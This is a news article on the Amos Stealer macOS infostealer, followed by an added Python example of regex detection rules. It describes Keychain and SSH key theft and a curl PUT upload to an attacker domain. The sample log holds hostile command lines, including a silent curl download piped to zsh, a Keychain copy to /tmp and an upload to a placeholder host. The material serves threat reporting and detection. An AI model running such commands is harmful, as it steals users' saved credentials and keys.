Amos Stealer Targets macOS Keychain Files and Browser Passwords

Amos Stealer, an information-stealing malware, is targeting Apple Mac computers to steal private data, according to new details from cybersecurity research firm CyberProof. Threat actors are reportedly using this malware family to run financially motivated campaigns that compromise macOS environments.
Although Amos Stealer is not new, in the latest campaign the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures.
Once inside a Mac, it searches for valuable files across system directories. It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers.
Researchers noted that the malware operators use a built-in macOS utility called curl to download the malicious files silently. During a recent incident investigation, a threat hunting query flagged an unusual curl command.
While doing so, they identified the specific server address that the cybercriminals were using to fetch the malicious script, as:
Further probing revealed that the hackers used specific command flags -fsSL to make the download completely invisible to the user. These flags stop error alerts, turn off download progress bars, and ensure the script runs quietly. Once the script is downloaded, it automatically launches an AppleScript command using the zsh terminal shell to begin collecting data.
“Amos Stealer remains a prominent and highly active malware family specifically engineered to target macOS users and extract sensitive information from compromised systems,” researchers explained in the blog post shared with Hackread.com.
Investigation also revealed that the info-stealer copies the macOS Keychain database file, named login.keychain-db, to access saved corporate login details. It also searches the user’s home path for confidential developer configuration files and keys, including .kube, .ssh, .zshrc, and .gitconfig.
To prepare the data for the hackers, the malware uses a native macOS tool called ditto to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder. This file is divided into 10 MB chunks by the script, and a unique session ID is generated for the upload by mixing the current timestamp with a random hexadecimal string from OpenSSL.
Amos Stealer then sends the data to the attacker-controlled server address (bestbuydomain.com) using an HTTP PUT request via curl. Notably, the script retries failed uploads up to eight times. After a successful upload, Amos Stealer runs the cleanup commands (rm -f /tmp/osalogging.zip and rm -rf /tmp/sync) to erase its presence.
This silent type of cyberattack allows threat actors to easily steal saved credentials, which can leave compromised corporate networks exposed to data breaches and financial theft. CyberProof recommends that companies enforce strict Gatekeeper policies and monitor endpoints for strange curl commands to block these threat actors.
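The endpoint monitoring CyberProof recommends can be expressed as a handful of process command-line rules covering each stage described above: the silent curl download piped into a shell, the Keychain and dotfile collection, the ditto archive and 10 MB split in /tmp, the curl PUT upload, and the rm cleanup. The following is an added example, not CyberProof's or Hackread's code; the log record format, the sample log lines and the example.invalid host are constructed for the demonstration, and the per-user chain view goes slightly beyond the article by correlating the stages so one user hitting most of them stands out.

```python
import re

# Added example, not CyberProof's or Hackread's code: regex rules for the
# behaviours described in the article, run over constructed process logs.
RULES = {
    # silent/fail/follow curl flags with output piped straight into a shell
    "silent_curl_to_shell": re.compile(
        r"\bcurl\b[^|]*\s-[A-Za-z]*[sS][A-Za-z]*\b[^|]*\|\s*(?:zsh|bash|sh|osascript)\b"),
    # Keychain database or developer secrets read by a copy/archive tool
    "keychain_db_access": re.compile(r"\b(?:cp|ditto|cat|tar|zip)\b.*login\.keychain-db"),
    "dev_secrets_access": re.compile(
        r"\b(?:cp|ditto|cat|tar|zip)\b.*(?:\.ssh|\.kube|\.gitconfig|\.zshrc)\b"),
    # ditto writing a zip into /tmp, then split chunking it for upload
    "ditto_archive_in_tmp": re.compile(r"\bditto\b.*/tmp/\S+\.zip"),
    "split_tmp_archive": re.compile(r"\bsplit\b.*-b\s*\d+[mMkK]?\b.*/tmp/"),
    # HTTP PUT / file upload of something in /tmp via curl
    "curl_put_upload": re.compile(r"\bcurl\b.*(?:-X\s*PUT|-T\s|--upload-file).*/tmp/"),
    # staging cleanup after the upload
    "tmp_cleanup": re.compile(r"\brm\s+-r?f\b.*/tmp/(?:\S*\.zip|sync)\b"),
}

def match_rules(cmdline):
    """Names of every rule the command line triggers, in RULES order."""
    return [name for name, pat in RULES.items() if pat.search(cmdline)]

def triage(log_lines):
    """Constructed record format: '<ts> user=<name> pid=<n> cmd=<command line>'.
    Returns (alerts, chain): alerts lists per-line hits; chain maps each user to
    the distinct rules seen, so one user walking the whole staging -> upload ->
    cleanup sequence stands out even when each single line looks mundane."""
    rec = re.compile(r"user=(\S+)\s+pid=\d+\s+cmd=(.*)$")
    alerts, chain = [], {}
    for line in log_lines:
        m = rec.search(line)
        hits = match_rules(m.group(2)) if m else []
        if hits:
            alerts.append({"user": m.group(1), "cmd": m.group(2), "rules": hits})
            chain.setdefault(m.group(1), set()).update(hits)
    return alerts, chain

# Constructed sample log (example.invalid is a placeholder host, not an IoC).
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z user=jdoe pid=411 cmd=curl -fsSL https://example.invalid/s.sh | zsh",
    "2024-01-01T10:00:02Z user=jdoe pid=412 cmd=cp /Users/jdoe/Library/Keychains/login.keychain-db /tmp/sync/",
    "2024-01-01T10:00:03Z user=jdoe pid=413 cmd=ditto -c -k /tmp/sync /tmp/osalogging.zip",
    "2024-01-01T10:00:04Z user=jdoe pid=414 cmd=split -b 10m /tmp/osalogging.zip /tmp/sync/part_",
    "2024-01-01T10:00:05Z user=jdoe pid=415 cmd=curl -X PUT -T /tmp/sync/part_aa https://example.invalid/u/1",
    "2024-01-01T10:00:06Z user=jdoe pid=416 cmd=rm -f /tmp/osalogging.zip",
    "2024-01-01T10:00:07Z user=build pid=417 cmd=curl -sS https://example.invalid/ci.json -o /tmp/ci.json",
]
```

Running `triage(SAMPLE_LOG)` flags the six jdoe lines and leaves the build user's plain curl download alone; the rules are heuristics, so tune the tool lists and paths to what your fleet actually runs before alerting on them.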
HackRead